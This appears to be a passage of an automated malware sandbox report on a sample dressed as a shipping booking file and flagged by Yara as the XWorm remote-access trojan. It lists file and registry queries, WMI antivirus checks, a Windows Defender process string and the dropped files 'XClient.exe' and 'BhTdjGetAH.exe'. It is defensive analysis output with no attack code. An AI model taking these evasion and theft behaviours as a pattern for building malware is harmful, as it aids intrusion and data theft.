Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 11.2.BhTdjGetAH.exe.288d464.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.2878b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.BhTdjGetAH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.31210c4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.310c7e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.31210c4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.310c7e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1844167553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2132, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 11.2.BhTdjGetAH.exe.288d464.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.2878b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.BhTdjGetAH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.31210c4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.310c7e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.31210c4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.310c7e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1844167553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7608, type: MEMORYSTR
